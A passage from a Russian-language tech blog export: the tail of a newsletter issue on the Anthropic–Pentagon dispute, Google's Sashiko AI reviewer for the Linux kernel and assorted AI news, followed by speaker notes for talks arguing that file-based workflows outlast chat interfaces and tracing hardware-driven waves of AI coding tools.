Для Минобороны разницы нет: «модель отказывается» = «компания отказывается». Но для AI-инженеров — вопрос фундаментальный. Если вы обучили модель с guidelines по безопасности — вы автор каждого последующего отказа? Ваши model cards, ограничения использования, RLHF — это «действие» или «высказывание»? Именно так ставит вопрос Минюст: поведение Anthropic — это conduct или speech? Если conduct — Первая поправка к Конституции не защищает. Ответ суда двадцать четвёртого марта может начать формировать прецедент, который определит, насколько безопасно вообще иметь политики ответственного AI.

И финальная ирония, которую невозможно не отметить.

Пентагон пишет: мы не можем рисковать, что AI-система станет недоступна в критический момент. В тот же день Claude лежал для десятков тысяч пользователей. Десять тысяч жалоб на DownDetector. Anthropic объяснила: «беспрецедентный спрос», приложение Claude стало номером один в App Store.

Anthropic не нужно намеренно отключать Claude. Claude отключается сам. От популярности. Компания судится за право быть надёжным партнёром для секретных военных систем — и не может обеспечить стабильность для обычных пользователей на той же неделе. Пентагону даже не пришлось это планировать — реальность написала их аргумент за них.

Продолжение — двадцать четвёртого марта.

## Сашико — AI, который штопает Linux kernel

Сашико. По-японски — 刺し子, «маленькие стежки». Традиционная техника декоративного стежка для укрепления ткани. Когда кимоно изнашивалось — его не выбрасывали, а укрепляли узорными стежками. Красота из ремонта.

Семнадцатого марта Google-инженер Роман Гущин объявил о запуске одноимённой системы: Sashiko — AI для code review ядра Linux. Она мониторит рассылку linux-kernel mailing list, подхватывает каждый отправленный патч и прогоняет через девятиступенчатый протокол проверки. Результат публикуется на sashiko.dev. Open source, Rust, лицензия Apache 2.0, хостинг в Linux Foundation, все токены и инфраструктуру оплачивает Google.

Метрика, которую все цитируют: на тесте из тысячи последних коммитов с тегами «Fixes:» — то есть коммитов, которые исправляли ранее допущенные баги — Sashiko нашла 53% багов в оригинальных патчах. Ключевая деталь: сто процентов этих багов были пропущены человеческими ревьюерами и приняты в mainline.

Первый рефлекс: «53% — не впечатляет, половину не нашла». Стоп. Переформулируем. Все эти баги прошли через людей, были одобрены и попали в ядро. Полнота обнаружения у людей на этих багах — ноль. Sashiko ловит пятьдесят три процента от того, что ловят ноль процентов людей. Любое число больше нуля — бесконечное улучшение.

У проекта необычная родословная. Промпты для AI-ревью написал Крис Мэйсон — инженер Meta, легенда Linux-разработки, создатель файловой системы Btrfs. Он публиковал их с осени прошлого года, изначально для Claude Code, и снизил долю ложных срабатываний до десяти процентов. Потом Роман Гущин из Google взял эти промпты и построил вокруг них полноценную систему.

Инженер Meta написал промпты. Инженер Google написал код. Linux Foundation хостит проект. Два человека из двух конкурирующих компаний — и их совместная работа ревьюит весь Linux kernel. Это возможно, потому что в kernel community репутация контрибьютора весомее, чем корпоративный бейдж. Мэйсон — легенда Btrfs. Гущин — уважаемый kernel-инженер. Им обоим ядро важнее корпоративной лояльности.

Теперь — архитектура. Она красивая.

Девять стадий. Не один LLM читает код — а девять отдельных прогонов с разными ролями. Первая стадия смотрит на общую картину: архитектурные проблемы, не ломает ли патч UAPI. Вторая — корректность реализации. Следующие пять — специализированные: безопасность, конкурентный доступ, управление ресурсами, обработка ошибок. Восьмая стадия — состязательная: её задача опровергнуть находки предыдущих стадий. Она пытается доказать, что каждая находка — ложная. То, что выживает после восьмой стадии, попадает в отчёт. Девятая — формирует вежливый email в формате рассылки.

Для AI-инженеров: мультиагентная архитектура без мультиагентного фреймворка. Тот же LLM, разные промпты, последовательные проходы, состязательная верификация. Простота реализации, но разделение ответственности даёт то, чего не хватает одному ревьюеру: невозможно одновременно думать об архитектуре, конкурентном доступе и обработке ошибок. Девять проходов решают задачу, которую один человеческий мозг потянуть не может — потому что AI может пройти один и тот же код девять раз с девятью разными фокусами и не устать к пятому.

Две детали, которые мне нравятся больше всего.

Рассылка linux-kernel mailing list — скажем мягко, не самое вежливое место в интернете. Линус Торвальдс однажды назвал чей-то код — цитирую — «абсолютным и безоговорочным мусором». В последние годы он стал мягче, но культура LKML — культура прямой, жёсткой обратной связи. Не из жестокости — из принципа: плохой код в ядре стоит очень дорого.

Девятая стадия Sashiko: «генерирует вежливый, стандартный email с комментариями в коде». Вежливый. AI-ревьюер ядра Linux конституционно запрограммирован быть вежливым. В сообществе, где вежливость считалась необязательной. Если Sashiko станет основным источником обратной связи по ревью — а при стопроцентном покрытии LKML это вопрос времени — тон дискуссий изменится. Не потому что люди стали добрее. А потому что AI выставил новую планку. Линус писал кодекс поведения в 2018-м. Брал перерыв «для работы над собой». А вежливость в kernel community в итоге принесёт prompt engineering.

Вторая деталь. В README Sashiko написано: «Этот проект построен с использованием Gemini CLI». AI-система для code review сама написана с помощью AI. Бутстрап. И тут же рядом: «Если вы меняете части, связанные с AI, пожалуйста, прогоните минимум несколько code review». Инструмент, который заменяет ручную проверку, сам нуждается в ручной проверке. Не лицемерие — честное признание: AI-ревью хорош как дополнение, а не как замена. Даже для кода, написанного AI.

На Maintainers Summit в конце прошлого года Линус Торвальдс сказал: «Разработчики годами жалуются на нехватку code review. LLM могут решить эту проблему. А когда AI начнёт писать код для ядра — нам понадобятся автоматизированные системы, чтобы этот код проверять».

Подумайте над этой цепочкой. Сейчас: люди пишут код, AI проверяет. Завтра: AI пишет код, AI проверяет. Кто в контуре? Мейнтейнер, который нажимает merge. Но мы уже обсуждали сегодня — в истории про Meta — что человек в контуре деградирует до формальной печати, когда автоматизированная система стабильно работает хорошо. Если Sashiko обычно находит правильные вещи — мейнтейнер будет обычно соглашаться. В девяноста пяти процентах случаев это нормально. В пяти — баг проходит в ядро, которое работает на миллиардах устройств.

Кто проверяет проверяющего? Пока — восьмая стадия Sashiko, состязательная верификация. Достаточно ли этого — покажет время. А пока — маленькие стежки, укрепляющие ткань.

## Быстрый блок: что ещё произошло за 48 часов

NVIDIA получила лицензии на продажу H200 в Китай — от обеих сторон. Десять месяцев заморозки. Китай был крупнейшим рынком NVIDIA — четверть выручки. После экспортных ограничений — доля упала до считанных процентов. На GTC Дженсен Хуанг объявил: лицензии от США и Китая получены, заказы приняты, производство перезапускается. H200 — не самый новый чип, но мощнее всего, что есть в Китае локально.

Два момента. Ограничения по железу для китайских AI-компаний ослабляются — та самая Xiaomi MiMo-V2-Pro, о которой мы говорили, обучена неизвестно на чём, но если H200 теперь доступны, следующее поколение китайских моделей будет тренироваться на лучшем железе.

И цитата Хуанга, которая идеально ложится в контекст. Его спросили про безопасность AI. Ответ: «Пугать всех научно-фантастической версией AI — это немного высокомерно». Прямой ответ на нарратив Anthropic — компании, которую Пентагон на той же неделе назвал «риском для цепочки поставок» именно за заботу о безопасности. Дженсен Хуанг — человек в кожаной куртке — говорит: хватит бояться, давайте строить. Anthropic говорит: давайте строить осторожно, вот наши красные линии. Пентагон говорит: ваши красные линии — угроза. Три позиции, одна неделя, нулевой консенсус.

Perplexity выпустила Comet — AI-браузер для iPhone. Агентный браузер: AI-ассистент, встроенный в каждую страницу, который может суммаризировать, сравнивать цены, заполнять формы, бронировать. На десктопе Comet стоил двести долларов в месяц. На iOS — бесплатно. Ещё один сигнал, что агентный браузинг — отдельная продуктовая категория. OpenAI строит Atlas, Google интегрирует Gemini в Chrome, Perplexity запускает Comet. Браузер становится следующей площадкой для агентов.

Mistral Small 4 — одна модель вместо трёх. Сто девятнадцать миллиардов параметров, Mixture-of-Experts, шесть миллиардов активных на токен. Apache 2.0 — полностью open source. Контекст двести пятьдесят шесть тысяч токенов. Ключевая фича — настраиваемая глубина рассуждений. Параметр reasoning_effort на каждый запрос: none — быстрый ответ в стиле чата, high — глубокий chain-of-thought. Одна модель заменяет три деплоя: Magistral для рассуждений, Pixtral для мультимодальности, Devstral для кодинга. Для тех, кто строит self-hosted агентные пайплайны и устал маршрутизировать между быстрой и думающей моделью — конкретное упрощение. Один эндпоинт, разное поведение. Ценник: пятнадцать центов за миллион входных токенов. Для self-hosted — ноль, только железо. Веса на Hugging Face, двести сорок два гигабайта.

Tencent: AI-агенты идут в WeChat. На earnings call восемнадцатого марта президент Tencent Мартин Лау подтвердил: компания строит AI-агента внутри WeChat. Полтора миллиарда пользователей. Агенты, вызывающие такси, бронирующие рестораны, управляющие задачами — всё через мини-программы WeChat. Запуск — возможно уже в апреле, если хватит вычислительных мощностей. Для разработчиков за пределами Китая — скорее контекст, чем руководство к действию. Но масштаб стоит держать в голове: если интеграция агентов в WeChat запустится, это будет самое крупное развёртывание агентного AI в истории.

Jellyfish: двадцать миллионов pull requests и парадокс продуктивности. Самое масштабное количественное исследование влияния AI на разработку: семьсот с лишним компаний, двести тысяч инженеров, двадцать миллионов pull requests. Шестьдесят четыре процента компаний генерируют большинство кода с AI-помощью. Лидеры по внедрению — двукратная пропускная способность.

Но совместное исследование с Harvard Economics показывает парадокс продуктивности: скорость растёт, а бизнес-результаты — нет. В сильно распределённых кодовых базах корреляция между внедрением AI и пропускной способностью вообще стремится к нулю. Вывод: контекст — узкое место. AI ускоряет написание кода, но ограничивающий фактор — понимание кодовой базы. И этот фактор AI пока не снимает.

Для тех, кого CEO спрашивает «а какой ROI от наших AI-инструментов» — вот данные. Скорость — да. Бизнес-результат — сложный вопрос.

UK copyright. Британское правительство опубликовало стодвадцатипятистраничный отчёт о копирайте и AI. Суть: они планировали легализовать обучение на защищённых авторским правом данных с возможностью opt-out для правообладателей. Творческие индустрии ответили настолько единодушным «нет», что правительство официально написало: «у нас больше нет предпочтительного варианта». Первое крупное правительство, которое отступило от разрешительного подхода. Для тех, кто задаётся вопросом «имеет ли кто-то право обучить модель на моём коде» — направление ветра меняется.

## Завершение: может ли AI развить вкус?

Напоследок — история за пределами инструментов и бизнеса. Вопрос, который звучит почти абсурдно: можно ли научить нейросеть вкусу?

Не правильному ответу — с этим LLM уже справляются. И не хорошему коду — это бенчмарки решают. Вкусу: способности отличить перспективную научную идею от проходной. Работу, которая изменит поле через пять лет — от работы, которую никто не процитирует.

Группа из Университета Фудань (Шанхай) опубликовала на arXiv работу «AI Can Learn Scientific Taste». Два миллиона сто тысяч статей с arXiv. Семьсот тысяч пар: «эта статья стала влиятельной» vs «эта — нет», с цитированиями в качестве сигнала. Обучение через RLCF — Reinforcement Learning from Community Feedback. Не от экспертов, не от рецензентов — от сообщества: цитирования как сигнал вознаграждения.

Результат: их Scientific Judge обогнал GPT-5.2 и Gemini 3 Pro в предсказании влиятельности статей. И — что важнее — обобщается между научными областями и временными периодами. Модель, обученная на физике, предсказывает влиятельные работы в биологии. Модель, обученная на старых статьях, предсказывает значимость новых.

Для data scientists: дизайн сигнала вознаграждения здесь нетривиальный. Цитирования — шумный сигнал: есть обзорные статьи с тысячами цитирований и прорывные работы, которые по-настоящему оценили через десять лет. То, что RLCF с таким шумным сигналом работает — само по себе результат.

Но меня здесь интересует философский слой. Мы весь выпуск говорили про AI, который делает вещи: пишет код, ищет баги, платит за сэндвичи, спорит с Пентагоном. Всё это — исполнение. «AI Can Learn Scientific Taste» — про другое. Про суждение. Не «что делать», а «что стоит делать». Не исполнение, а курирование.

Если это масштабируется — меняется не только то, как мы делаем науку. Меняется кто решает, какая наука стоит того, чтобы её делать. Грантовые комитеты, рецензенты журналов, программные комитеты конференций — все они занимаются, по сути, предсказанием значимости. И модель из Шанхая утверждает, что делает это лучше.

Маленькие стежки, укрепляющие ядро. Код, который ждал двадцать семь лет. Телефонная компания с фронтирной моделью. Глава AI-безопасности, которая не может защитить свой почтовый ящик. И нейросеть, которая учится отличать хорошую науку от проходной.

Неплохая неделя. Меня зовут Олег Чирухин. Спасибо, что читаете.

Xiaomi MiMo
Hunter Alpha
Stripe MPP
HTTP 402
Anthropic
Pentagon
Sashiko
Linux kernel
AI agents
AI safety
DeepSeek
NVIDIA H200


=================================================
# TALKS
=================================================


---
## URL: https://oleg.guru/talks/100-percent-generation
## Title: ПРАВИЛО БЕЗОПАСНОЙ ГАВАНИ (SAFE HARBOR)
---

ПРАВИЛО БЕЗОПАСНОЙ ГАВАНИ (SAFE HARBOR)Previous slideNext slideToggle fullscreenOpen presenter view

НАПОМИНАЛКИ:
• Цифры должны шокировать — дай им повисеть
• Цитата Тейлора — пауза после неё
• Вопрос задать аудитории напрямую

ТЕКСТ:
Двести два миллиарда долларов. Это AI-инвестиции за 2025 год. Половина всего венчурного капитала мира. 800 миллионов человек каждую неделю разговаривают с ChatGPT. Даже Брет Тейлор из OpenAI говорит: «у нас тоже пузырь».

И вопрос, который обсуждают все: заменит ли AI программистов? Чат вместо кода? Промпт вместо спецификации?

Я хочу показать, что этот вопрос задавали раньше. Много раз. И ответ был одинаковым.

НАПОМИНАЛКИ:
• Это история, не лекция — рассказывай как детектив
• Главный тезис: файлы побеждают чат каждый раз
• Не давай ответ сразу — создавай интригу
• 30 минут = держи темп

ТЕКСТ:
Привет! Сегодня я расскажу историю. Не про технологии — про паттерн. Один и тот же паттерн, который повторяется в computing уже 80 лет. И который прямо сейчас повторяется снова — с AI.

НАПОМИНАЛКИ:
• Каждую строку — с паузой, как удары
• «Каждый раз файлы побеждали» — выделить голосом
• После этого слайда — перейти к «давайте начнём с начала»

ТЕКСТ:
1961 — интерактивные терминалы, будущее! 1973 — живая среда LISP, будущее! 1985 — экспертные системы, будущее! 1997 — UML-диаграммы, будущее! 2022 — ChatGPT, будущее!

И каждый раз — файлы побеждали. Не потому что они лучше. А потому что они достаточно хороши — и у них есть свойства, которых нет у «чата». Давайте начнём с начала.

НАПОМИНАЛКИ:
• Секционный слайд — просто назвать и перейти
• Не задерживаться

ТЕКСТ:
Первый цикл. Начало шестидесятых. Впервые человек разговаривает с компьютером.

НАПОМИНАЛКИ:
• Дать почувствовать боль — часы ожидания!
• ENIAC — не абстракция, 27 тонн в комнате
• «Не видит компьютер» — ключевая фраза

ТЕКСТ:
Представьте: вы программист в 1955 году. Вы пишете программу на бумаге, пробиваете перфокарты, сдаёте стопку оператору — и ждёте. Часы. Иногда сутки. Потом получаете распечатку. Видите ошибку. Начинаете заново.

Вы не видите компьютер. Не общаетесь с ним. Это как переписка письмами — только с машиной.

НАПОМИНАЛКИ:
• Corbató — герой, Тьюринговская премия за это
• «Сразу» — подчеркнуть контраст с перфокартами
• Цитата Лицклайдера — произнести как манифест

ТЕКСТ:
1961 год. Fernando Corbató в MIT создаёт CTSS — Compatible Time-Sharing System. Впервые несколько человек одновременно работают на одном компьютере. Впервые вы печатаете команду — и получаете ответ. Сразу. Не через часы. Сразу.

Лицклайдер годом раньше написал визионерскую статью «Симбиоз человека и компьютера». И данные подтвердили: интерактивные пользователи работали на порядок продуктивнее. Это была революция.

НАПОМИНАЛКИ:
• Историю про секретаря рассказать как анекдот
• 200 правил! — подчеркнуть примитивность
• ELIZA effect — люди верят, что программа понимает
• Параллель с ChatGPT пока НЕ озвучивать — аудитория сама додумает

ТЕКСТ:
1966 год. Тот же MIT. Джозеф Вейценбаум создаёт ELIZA — программу из двухсот правил, которая прикидывается психотерапевтом. Никакого понимания. Чистый pattern-matching. «Расскажите мне об этом подробнее.»

И вот анекдот, который, возможно, правда. Секретарь Вейценбаума попросила его выйти из комнаты — чтобы поговорить с ELIZA наедине. 200 правил — и человек верит, что машина его понимает.

Вейценбаум назвал это «ELIZA effect». Шёл 1966 год. Кое-кому это напоминает 2022-й?

НАПОМИНАЛКИ:
• «Всё есть файл» — произнести как девиз
• Thompson и Ritchie — назвать героями
• ed → vi → IDE — линия, которая идёт до сегодня
• Пауза перед «50 лет»

ТЕКСТ:
А теперь — развязка первого цикла. Thompson и Ritchie уходят из слишком сложного проекта Multics. Создают Unix. Маленькую, элегантную систему с одним принципом: «всё есть файл».

Ed — строковый редактор. Vi — полноэкранный. C — язык, в котором весь workflow файловый: редактируй, компилируй, запускай. Pipe — связываешь программы через текстовые потоки.

Time-sharing дал интерактивность. Но программы, конфиги, данные — всё сохраняется в файлах. Этот подход определил следующие пятьдесят лет.

Файлы: один, чат: ноль.

ТЕКСТ:
Второй цикл. Самый драматичный. Xerox PARC и самая продвинутая IDE в истории.

НАПОМИНАЛКИ:
• DWIM — дать аудитории прочувствовать, как это круто
• «Живой объект» — контраст с файлами
• Claude Code — осознанная провокация, это мой личный опыт
• Держать паузу — аудитория должна спросить «и что случилось?»

ТЕКСТ:
Xerox PARC, начало семидесятых. Тейтельман и Боброу создают Interlisp-D — среду разработки, которая в некоторых аспектах продвинутее наших инструментов сегодня. Я лично это исследовал.

DWIM — Do What I Mean. Вы допустили опечатку, система догадывается, что вы имели в виду, и исправляет. Structure-aware editing — редактор понимает структуру кода. Live debugging — отладка прямо в работающей программе. Код — не текст в файле, а живой объект в памяти.

Это было будущее. И оно случилось в 1973 году.

НАПОМИНАЛКИ:
• Alan Kay — «изобрёл будущее»
• Image-based — объяснить: как snapshot виртуальной машины
• «Нет контроля версий» — уже намекнуть на причину поражения

ТЕКСТ:
Рядом, в том же PARC — Алан Кей создаёт Smalltalk. Ещё радикальнее. Вся программа — живой образ в памяти. Нет файлов. Нет стадии компиляции. Вы меняете объект — и изменение сразу в системе.

Smalltalk вдохновил Macintosh. Стив Джобс увидел демо в PARC — и всё понял.

Но у image-based подхода — фатальная проблема. Нет контроля версий. Нет совместной работы. Как вы сделаете diff двух живых образов? Как вы сделаете code review?

НАПОМИНАЛКИ:
• Таблицу дать зрителям прочитать самим
• $100K vs $50 — дать повисеть
• «Достаточно хорошо» — ключевой инсайт
• 600K — выделить голосом

ТЕКСТ:
И вот развязка. LISP-машина — сто тысяч долларов. Специализированное железо. Живая среда. Продали около десяти тысяч.

IBM PC — полторы тысячи. Turbo Pascal — сорок девять долларов и девяносто девять центов. IDE, компилятор и линкер — в 39 килобайтах. Продали шестьсот тысяч за три года.

Будущее проиграло. Не потому что файлы лучше живой среды. А потому что дешёвое универсальное железо плюс файлы — достаточно хорошо. И это закономерность, которую мы увидим снова и снова.

ТЕКСТ:
Третий цикл. Короткий, но важный — потому что он самое точное зеркало сегодняшних обещаний AI.

НАПОМИНАЛКИ:
• $2.1B — IBM верил в это серьёзно
• 14 типов — это абсурдно много, подчеркнуть
• «Сложнее, чем написать код» — ключевая ирония
• Сгенерированный код — как в AI?

ТЕКСТ:
Конец девяностых. UML — Unified Modeling Language. Идея красивая: рисуешь диаграмму, генерируешь код. Модель это код. IBM верит настолько, что покупает Rational за два с лишним миллиарда долларов.

14 типов диаграмм. Четырнадцать! И ирония: освоить UML сложнее, чем написать код, который он призван заменить.

А сгенерированный код? Раздутый. Неидиоматичный. Неподдерживаемый. Последняя миля бизнес-логики — всегда ручной код.

НАПОМИНАЛКИ:
• Fowler — автор книги по UML — подписывает Agile Manifesto
• Это предательство изнутри — подать драматично
• 2016 — тихая смерть, без фанфар

ТЕКСТ:
2001 год. 17 практиков собираются в Сноуберде, Юта. Пишут Agile Manifesto. «Работающий софт важнее исчерпывающей документации.» Прямой удар по UML.

И вот деталь, которую я люблю. Martin Fowler — автор книги «UML Distilled», одной из самых популярных книг по UML — среди подписавших Agile Manifesto. Даже евангелист UML понял, что это тупик.

2016: Visual Studio тихо убирает поддержку UML. Без фанфар. Просто удалили.

НАПОМИНАЛКИ:
• Таблицу показать — и дать повисеть
• Не говорить «AI проиграет» — сказать «паттерн знакомый»
• Последняя миля — ключевой термин
• Вопросительные знаки — осознанно

ТЕКСТ:
И вот зеркало. UML: заменим код диаграммами. AI: заменим код промптами. UML: модель это код. AI: промпт это код. UML: сгенерированный код неподдерживаемый. AI: сгенерированный код... пока вопрос открытый.

Но паттерн — знакомый. Оба подхода недооценивают сложность реального софта. Каркас — пожалуйста. Но последняя миля бизнес-логики — ручной код. Как всегда.

ТЕКСТ:
Четвёртый цикл. И самый тревожный. Потому что параллели — один в один.

НАПОМИНАЛКИ:
• $40M экономии — это реальный результат, не хайп
• «По одной в неделю» — знакомо?
• Япония вложила $850M — не забыть
• Пока не говорить чем кончилось — интрига

ТЕКСТ:
1980-е. Экспертные системы. DENDRAL анализирует химические соединения. MYCIN диагностирует инфекции. R1/XCON конфигурирует компьютеры DEC и экономит сорок миллионов долларов в год. Реальная экономия.

Инвестиции — больше миллиарда в год к 1985-му. Новые AI-компании — по одной в неделю. Звучит знакомо? Япония запускает проект Fifth Generation Computer — 850 миллионов долларов.

НАПОМИНАЛКИ:
• «За один год» — пауза, дать осознать
• 300+ компаний — масштаб катастрофы
• Цитата Шварца — кульминация, произнести медленно
• Пока НЕ показывать параллели — следующий слайд

ТЕКСТ:
1987. За один год рынок LISP-машин уничтожен. Дешёвые персоналки научились делать то же самое. 300 с лишним AI-компаний закрылись. Symbolics — флагман LISP-машин — банкрот.

Шенк и Минский — основатели AI как науки — предупреждали ещё в 1984-м. Но их не слушали.

Джек Шварц из DARPA подвёл итог: «Это просто хитрое программирование». Не искусственный интеллект. Хитрое программирование. Хрупкое, дорогое в поддержке, не умеющее учиться и обобщать.

НАПОМИНАЛКИ:
• Дать таблице повисеть — не комментировать сразу
• «$200B» — в 200 раз больше
• «Галлюцинации» — современный аналог «не обобщает»
• НЕ говорить «AI обречён» — сказать «паттерн тревожный»

ТЕКСТ:
Посмотрите на параллели. Миллиард тогда — двести миллиардов сейчас. «Заменит экспертов» — «заменит программистов». Реальная экономия в конкретных нишах — и тогда, и сейчас. Хрупкость: экспертные системы не обобщали. LLM — галлюцинируют.

Я не говорю, что AI обречён. Масштаб другой, технология другая. Но паттерн — тревожный. И вопрос: а может, и в этот раз «хитрое программирование»?

ТЕКСТ:
Между большими циклами были три «тихие» победы файлового подхода. Без драмы, без краха — просто файлы впитали каждую революцию.

НАПОМИНАЛКИ:
• Три примера — быстро, по 30 секунд каждый
• GUI = файлы — неожиданный поворот для многих
• HTTP GET = «дай файл» — это вызывает улыбку
• Jupyter — мост к следующей секции

ТЕКСТ:
Между большими циклами — три тихие победы файлов.

Первая: GUI. Macintosh. Windows 95. Самая массовая «интерактивная» революция в истории. Но на что вы смотрите на рабочем столе? Папки и файлы. Save As. Drag-and-drop. GUI не убил файлы — визуализировал их.

Вторая: веб. Четвёртый великий интерфейс. Но из чего состоит веб? HTML, CSS, JavaScript — файлы. URL — адрес ресурса. HTTP GET — буквально «дай файл». Даже веб — файловый.

Третья: Jupyter. Десять миллионов ноутбуков на GitHub. Гибрид чата и файла. Но стандартный workflow в любой компании: исследуй в notebook, потом перенеси в .py файлы. Гибрид, который не стал IDE.

ТЕКСТ:
А теперь — текущий цикл. Вы его узнаете.

НАПОМИНАЛКИ:
• 100M за 2 месяца — рекорд
• Цепочка — показать что ChatGPT не первый
• «А дальше?» — пауза, не отвечать сразу
• Аудитория к этому моменту уже знает ответ

ТЕКСТ:
Ноябрь 2022. ChatGPT. Сто миллионов пользователей за два месяца. Абсолютный рекорд.

Но посмотрите на цепочку. CTSS — первый терминал. ELIZA — первый чатбот. MS-DOS — командная строка. VB и Delphi — визуальное программирование. Jupyter — ноутбуки. ChatGPT.

Это восьмая итерация того же паттерна. Новый «чатовый» интерфейс computing. Каждый раз — восторг. А дальше?

НАПОМИНАЛКИ:
• Cursor $1B ARR — файловый! Это ключевое
• Claude Code — markdown-файлы как конфиг
• Kiro — кульминация: AI генерирует спеки
• Нарастающий темп — каждый пример быстрее

ТЕКСТ:
А дальше — файлы контратакуют. Как всегда.

Copilot и Cursor. AI интегрирован в файловые IDE. Cursor — миллиард долларов годовой выручки. AI-first, но файловый. Редактируй, компилируй, запускай — с AI-усилением.

Claude Code, Codex CLI. Терминальные агенты. Что они делают? Читают и пишут файлы. CLAUDE.md — конфиг через markdown-файл.

И Kiro от AWS. Самое буквальное воплощение паттерна: requirements.md, design.md, tasks.md — и потом код. AI-революция породила инструмент, который генерирует спецификации. В файлах.

НАПОМИНАЛКИ:
• Четыре «только для файлов» — как молотком
• Контроль версий — не фича, а фундамент
• Это не баг — это архитектура индустрии
• После этого слайда — тезис

ТЕКСТ:
И финальный аргумент. Git. Diff — только для файлов. Merge — только для файлов. Branch — только для файлов. Code review — только для файлов.

Вы не можете сделать git diff двух чат-сессий. Не можете сделать merge двух REPL-историй. Не можете сделать code review живого образа Smalltalk.

Контроль версий — это не фича. Это фундамент всей индустрии разработки. И он работает только с файлами. Это структурное преимущество, которое не зависит от технологии.

НАПОМИНАЛКИ:
• Три пункта — чётко и кратко
• «Не зависят от технологии» — ключевой инсайт
• 1972 → 2025 — рамка всей истории
• Это не ностальгия — это инженерная реальность

ТЕКСТ:
Так почему файлы побеждают? Три причины.

Первая: контроль версий. Diff, merge, branch, blame — работают только с текстовыми файлами. Ни одна альтернатива за 50 лет не предложила ничего сравнимого.

Вторая: совместная работа. Code review, pull requests, CI/CD — всё построено вокруг файлов.

Третья: воспроизводимость. Файл на моей машине — тот же файл на вашей машине — тот же файл на сервере.

Эти три свойства не зависят от технологии. Они работали в 1972 году с Unix и C. Они работают в 2025 году с Cursor и Claude Code.

НАПОМИНАЛКИ:
• Это сводная таблица — дать прочитать
• 8 строк — 8 циклов — один исход
• Не комментировать каждую строку — итог говорит сам

ТЕКСТ:
Восемь циклов. Один паттерн. Каждый раз — новый «чатовый» интерфейс, восторг, обещания. И каждый раз — файловый подход побеждает в продакшене.

Посмотрите на правый столбец. Unix. Turbo Pascal. Папки на рабочем столе. HTML-файлы. Agile. Py-файлы. Cursor и Kiro. Файлы. Каждый. Раз.

НАПОМИНАЛКИ:
• «Не умирают» — важно, это не anti-AI доклад
• «Сколько чата и сколько файлов» — настоящий вопрос
• «Исследуй / строй» — двойка, запомнят
• Финальную фразу — медленно, с паузой
• ПОКЛОН

ТЕКСТ:
И последнее. Вопрос — не «чат или файлы». Интерактивные инструменты не умирают. REPL жив. Jupyter жив. ChatGPT будет жить.

Вопрос — сколько чата и сколько файлов. И ответ, который computing даёт нам 80 лет подряд: исследуй в чате, строй в файлах.

Это не баг. Это 80 лет эволюции. Спасибо.

НАПОМИНАЛКИ:
• Это история, не лекция — рассказывай как детектив
• Главный тезис: файлы побеждают чат каждый раз
• Не давай ответ сразу — создавай интригу
• 30 минут = держи темп

ТЕКСТ:
Привет! Сегодня я расскажу историю. Не про технологии — про паттерн. Один и тот же паттерн, который повторяется в computing уже 80 лет. И который прямо сейчас повторяется снова — с AI.

🎯 НАПОМИНАЛКИ:
• Представиться. Тема: не хронология, а волны. Каждая волна запускается чипом
• Пять волн, каждая — от железа до практик. Волны перекрываются
• «Следующие 30 минут — пять историй о том, как физика меняет нашу работу»

📖 ТЕКСТ:
Добрый день! Я мог бы рассказать вам историю AI-кодогенерации хронологически — год за годом. Но это было бы скучно и не передало бы главного. Главное — это волны. Каждая волна начинается с нового чипа. Чип делает возможной новую науку. Наука порождает продукт. Продукт меняет практики. И пока первая волна ещё не докатилась до практик — уже поднимается следующая. За девять лет — пять волн. Каждая быстрее предыдущей. И все они перекрываются. Давайте их пройдём.

🎯 НАПОМИНАЛКИ:
• Четыре цвета = четыре слоя. Запомнить — они будут на каждом слайде
• Каскад ВСЕГДА сверху вниз: Hardware → Science → Products → Practices
• Задержка сжимается: 4 года → 6 месяцев. Волны перекрываются

📖 ТЕКСТ:
Вот модель, через которую мы будем смотреть на всё. Четыре слоя. Железо — фундамент, оно определяет, что физически возможно. Наука — двигатель: архитектуры, методы обучения, оптимизации inference. Продукты — то, что вы запускаете: Cursor, Claude Code, Copilot. Практики — то, как реально изменилась ваша работа. Каскад всегда идёт сверху вниз. Но вот что интересно: задержка между слоями сжимается. В 2017 году от чипа до продукта проходило четыре года. В 2025 — шесть месяцев. А это значит, что волны перекрываются: пятая поднимается, когда третья ещё не закончилась.

🎯 НАПОМИНАЛКИ:
• Волна 1: V100 → Transformer → (4 года!) → Copilot → Comment-Driven Dev
• Ключевой момент: без Tensor Cores attention непрактичен
• RLHF (Christiano 2017) — семя, прорастёт через 5 лет

📖 ТЕКСТ:
Первая волна. 2017 год. Два события, которые определят десятилетие. NVIDIA выпускает V100 — первый чип с Tensor Cores. А команда Google публикует «Attention Is All You Need». Два события — а потом четыре года тишины. Почему? Потому что от фундаментального открытия до продукта нужна инфраструктура. Нужен масштаб. Нужно понять, как это использовать. Первая волна — самая медленная. Но именно она заложила фундамент для всего остального.

🎯 НАПОМИНАЛКИ:
• V100 = первые Tensor Cores, 125 TFLOPS — матрицы 5-12× быстрее
• Transformer = self-attention, параллелизм, O(1) расстояние
• RLHF foundations (2017) — мост от «мощного» к «полезному», но позже
• Каскад: V100 Tensor Cores → attention стал практичным

📖 ТЕКСТ:
V100 — первый чип с Tensor Cores. Специализированные блоки для матричных умножений, ускоряющие deep learning в 5-12 раз. В том же году — статья «Attention Is All You Need». Transformer. Self-attention вместо рекуррентности. Ключевое свойство: вся последовательность обрабатывается параллельно, расстояние между любыми позициями — O(1). Красивая математика, но она требует колоссального количества матричных умножений. V100 с Tensor Cores оказался именно тем, что нужно. Без этого чипа Transformer мог бы остаться академической диковинкой. Это наш первый пример каскада: физика определяет, какая наука станет практичной. В том же 2017-м Christiano et al. заложили основы RLHF — обучения из человеческих предпочтений. Это семя прорастёт только через пять лет, когда InstructGPT покажет, что маленькая модель с RLHF побеждает огромную без.

🎯 НАПОМИНАЛКИ:
• BERT (2018), GPT-2 (2019), GPT-3 (2020) — наука работает, продуктов нет
• Copilot preview = июнь 2021, Codex, VS Code
• 27% кода AI-generated. 1M+ пользователей за год
• Comment-driven dev: комментарий = вход, код = выход
• Speculative decoding тоже 2021 — важная инфраструктура для будущего

📖 ТЕКСТ:
